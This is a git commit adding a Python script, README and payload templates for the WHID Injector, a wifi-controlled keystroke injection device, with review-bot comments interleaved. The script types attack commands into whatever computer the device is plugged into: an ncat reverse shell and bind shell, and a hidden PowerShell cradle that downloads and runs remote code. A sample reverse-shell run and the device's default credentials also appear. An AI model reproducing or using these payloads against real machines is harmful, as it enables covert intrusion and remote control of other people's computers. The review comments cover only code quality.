Beta release - Simple shells and commands exec

master
Swissky 2017-11-16 22:07:00 +01:00
parent e707f86e12
commit e2bff87c34
7 changed files with 223 additions and 2 deletions


@ -1,2 +1,69 @@
# WHID_Toolkit
Simple script for the WHID injector - a rubberducky wifi
# WHID Injector
**Disclaimer: Little project to interact with the WHID, mostly because I didn't wanted to modify the firmware to support my keyboard, feel free to improve it ;)**
What is it ? It's a simple script to send commands (french keyboard) from your terminal to the WHID Injector. It will automatically convert the "azerty" to "qwerty" format. Furthermore it has builtins payload such as reverse-shell and bind-shell.
Where to buy a WHID Injector ? I got mine from [Aliexpress](https://www.aliexpress.com/item/Cactus-Micro-compatible-board-plus-WIFI-chip-esp8266-for-atmega32u4/32318391529.html)
## How to start
Connect to the Access Point with the SSID "**Exploit**" with a password of "**DotAgency**".
Open a web browser pointed to "**http://192.168.1.1**"
The default administration username is "**admin**" and password "**hacktheplanet**".
Remember to upgrade the firmware you will find the version 2.7 in this repository
More info on the official Github : https://github.com/whid-injector/WHID
## How to use the script
```python
python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt -a -h 127 ↵
usage: WHIDInjector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
[--user [USER]] [--pass [PASS]] [--panel [PANEL]]
[--payload [PAYLOAD]]
optional arguments:
-h, --help show this help message and exit
-v Verbosity of the output
--host [HOST] Host reverse-shell
--port [PORT] Port reverse-shell
--user [USER] Wifi Panel username
--pass [PASS] Wifi Panel password
--panel [PANEL] Wifi Panel password
--payload [PAYLOAD] Payload template
```
Targeting a Windows OS
```
python3 WHIDInjector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt
```
Send a simple reverse-shell payload
```python
$ python3 WHIDInjector.py -v --host 127.0.0.1 --port 4444 1 ↵
-------------------------------------------------------------
WHID injector - You need to be connected to the Exploit AP
-------------------------------------------------------------
__ °
<(o )___
( ._> /
`---' @pentest_swissky
Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
-------------------------------------------------------------------
>>> reverse
Payload:
Rem:Default Payload
Press:130+195
CustomDelay:1000
Print:bqsh 6c 4nohup ncqt !@&<)<)<! $$$$ 6e ]SHELL 14
CustomDelay:1000
Press:176
Sending payload to http://192.168.1.1/runlivepayload
```
# What's next ?
TODO change_ssid_name
TODO change_ssid_pass
TODO update_firmware
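Review bot: the `--panel` entry in the usage block (`--panel [PANEL] Wifi Panel password`) repeats the `--pass` description and should describe the panel URL instead; the same copy-paste is in the argparse help in WHIDInjector.py. The two usage blocks are fenced as ```python but contain a shell command line and terminal output, so a ```console or ```bash fence would render them correctly. The "How to start" section lists the device's factory AP SSID, AP password and admin credentials without telling the reader to change them, although the "What's next" TODOs (change_ssid_name, change_ssid_pass) show this is planned; a one-line note that the defaults are public and should be changed on first use would be worth adding now rather than later. Minor: "I didn't wanted" should be "I didn't want", and "builtins payload" should be "built-in payloads".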

WHIDInjector.png Normal file

WHIDInjector.py Normal file

@ -0,0 +1,137 @@
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import requests
import argparse
from urllib.parse import urlencode, quote_plus
def banner():
print("""
\033[93m -------------------------------------------------------------\033[0m
\033[1m WHID injector - You need to be connected to the Exploit AP\033[0m
\033[93m -------------------------------------------------------------
__ °
<(o )___
( ._> /
`---'\033[0m @pentest_swissky
""")
print("Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'")
print("-------------------------------------------------------------------")
def help():
print("--------------[ Commands ]--------------")
print("Comment => Rem: Comment")
print("Delay => CustomDelay:1000")
print("Send key => Press:X+Y, Press:131+114")
print("Send text => Print:XYZ")
print("Move mouse => MouseMoveUp:X, MouseMoveDown:X, MouseMoveLeft:X, MouseMoveRight:X")
print("Mouse click => MouseClickLEFT:X, MouseClickRIGHT:X, MouseClickMIDDLE:X")
print("Blink led => BlinkLED:X")
print("The work around for writing a script that requires a '<' is to replace all instances of '<' with '&lt;'.")
print("")
print("--------------[ KeyboardModifiers ]--------------")
print("Key Decimal| Key Decimal")
print("KEY_LEFT_CTRL 128 | KEY_LEFT_SHIFT 129")
print("KEY_LEFT_ALT 130 | KEY_LEFT_GUI 131")
print("KEY_RIGHT_CTRL 132 | KEY_RIGHT_SHIFT 133")
print("KEY_RIGHT_ALT 134 | KEY_RIGHT_GUI 135")
print("KEY_UP_ARROW 218 | KEY_DOWN_ARROW 217")
print("KEY_LEFT_ARROW 216 | KEY_RIGHT_ARROW 215")
print("KEY_BACKSPACE 178 | KEY_TAB 179")
print("KEY_RETURN 176 | KEY_ESC 177")
print("KEY_INSERT 209 | KEY_PAGE_UP 211")
print("KEY_DELETE 212 | KEY_HOME 210")
print("KEY_END 213 | KEY_CAPS_LOCK 193")
print("KEY_F1 194 | KEY_F2 195")
print("KEY_F3 196 | KEY_F4 197")
print("KEY_F5 198 | KEY_F6 199")
print("KEY_F7 200 | KEY_F8 201")
print("KEY_F9 202 | KEY_F10 203")
print("KEY_F11 204 | KEY_F12 205")
def convert_to_keymap(user_input, payload):
# TODO find > < and |
fr_mapping = './mazqwAZQW&é"\'(-è_çà)^$Mù,?;:!§1234567890'
en_mapping = '<>;qwazQWAZ1234567890-[]:\'mM,./?!@#$%^&*()'
user_converted = user_input.translate(str.maketrans(fr_mapping,en_mapping))
user_converted = payload % user_converted
return user_converted
def send_payload(user_converted, panel):
payloads = { "livepayload":user_converted, "livepayloadpresent":1}
encoded = urlencode( payloads, quote_via=quote_plus)
try:
print('Sending payload to %s' % panel)
if not "200" in str(requests.post(panel, data=encoded)):
print("\033[91mError 404, are you connected on the right AP?")
except Exception as e:
print("\033[91mError, couldn't reach the Wifi Portal !")
def check_panel(panel):
try:
if not "ESPloit" in requests.get(panel, timeout=1).text:
print("\033[91mError 404, are you connected on the right AP?")
except Exception as e:
print("\033[91mError, couldn't reach the Wifi Portal !\033[0m")
if __name__ == "__main__":
# Parsing argument from command line
parser = argparse.ArgumentParser()
parser.add_argument('-v', action='store_true', dest='verbose',help='Verbosity of the output')
parser.add_argument('--host', nargs='?', default='127.0.0.1', help='Host reverse-shell' )
parser.add_argument('--port', nargs='?', default='4242', help='Port reverse-shell' )
parser.add_argument('--user', nargs='?', default='admin', help='Wifi Panel username')
parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Wifi Panel password')
parser.add_argument('--panel',nargs='?', default='http://192.168.1.1', help='Wifi Panel password')
parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template')
results = parser.parse_args()
# Default payload
payload = ""
with open(results.payload,'r') as f:
payload = f.read()
banner()
check_panel(results.panel)
while(True):
user_input = input("\033[92m>>> \033[0m")
# Simple user interactions
if user_input == "q" or user_input=="exit":
exit()
elif user_input == "h" or user_input == "help":
help()
continue
# Reverse Shell Linux
elif user_input == "reverse":
user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)
# Bind Shell Linux
elif user_input == "bind":
user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)
# Empire or anything for Windows
elif "empire" in user_input :
# Recommended https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1
args = user_input.split(" ")
user_input = "powershell -W Hidden -nop -noni -c \"IEX (New-Object Net.Webclient).downloadstring('%s')\"" % args[1]
# Send evil payload
if user_input != "":
# Convert from AZERTY to QWERTY
user_converted = convert_to_keymap(user_input, payload)
if results.verbose == True:
print('\033[92mPayload:\033[0m\n%s' % user_converted)
# Send the payload
send_payload(user_converted, results.panel+"/runlivepayload")
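Review bot: `send_payload` decides success with `"200" in str(requests.post(panel, data=encoded))`, which string-matches the `<Response [200]>` repr and then reports "Error 404" for every other status; check `resp.status_code == 200` (or call `resp.raise_for_status()`) and print the real code. Related: `check_panel` only prints on failure and the main block enters `while(True)` regardless, so it should return a bool and the script should `sys.exit(1)` when the panel is unreachable (prefer `sys.exit` over the bare `exit()` used in the loop as well). `--user` and `--pass` are parsed but never used, and `--pass` is stored as `results.pass`, which is a syntax error the moment anyone references it with dot access (`pass` is a keyword); give it `dest='password'` or drop both options until the panel actually authenticates requests. The `--panel` help string says "Wifi Panel password" (copy-paste from `--pass`). In the `empire` branch, `args[1]` raises IndexError when no URL follows the keyword; check `len(args) == 2` before indexing. `convert_to_keymap` maps `.` to `<` and `/` to `>`, which is right for an AZERTY host, but the device help printed by `help()` says a `<` in a script must be written as `&lt;`, and the TODO on the same function notes the same three characters, so the conversion should escape `<` before the `%` substitution. Finally, `help()` shadows the builtin, and pre-encoding the form body with `urlencode(...)` into a str makes `requests` send it without a Content-Type header; passing the `payloads` dict directly to `data=` lets requests encode it and set `application/x-www-form-urlencoded`.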

payloads/default.txt Normal file

@ -0,0 +1,6 @@
Rem:Command Execution
Press:130+195
CustomDelay:1000
Print:%s
CustomDelay:1000
Press:176
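Review bot: the `Rem:Command Execution` line does not say which desktop this template is for, whereas `Press:130+195` (KEY_LEFT_ALT + KEY_F2 in the modifier table printed by `help()`) only opens a run dialog on certain Linux desktop environments; name the target in the `Rem:` line as `i3.txt` and `windows.txt` do, and mention in the README that `payloads/default.txt` is what `--payload` falls back to.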

payloads/i3.txt Normal file

@ -0,0 +1,6 @@
Rem:Command Execution for i3
Press:131+176
CustomDelay:1000
Print:%s
CustomDelay:1000
Press:176

payloads/windows.txt Normal file

@ -0,0 +1,5 @@
Rem:Command Execution for Windows
Press:131+114
CustomDelay:1000
Print:%s
CustomDelay:1000
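Review bot: this template is the only one of the three that ends after `CustomDelay:1000` without a closing `Press:176`, so the typed text is left in the run box unsubmitted; if that is intended, say so in the `Rem:` line, otherwise bring it in line with `default.txt` and `i3.txt`.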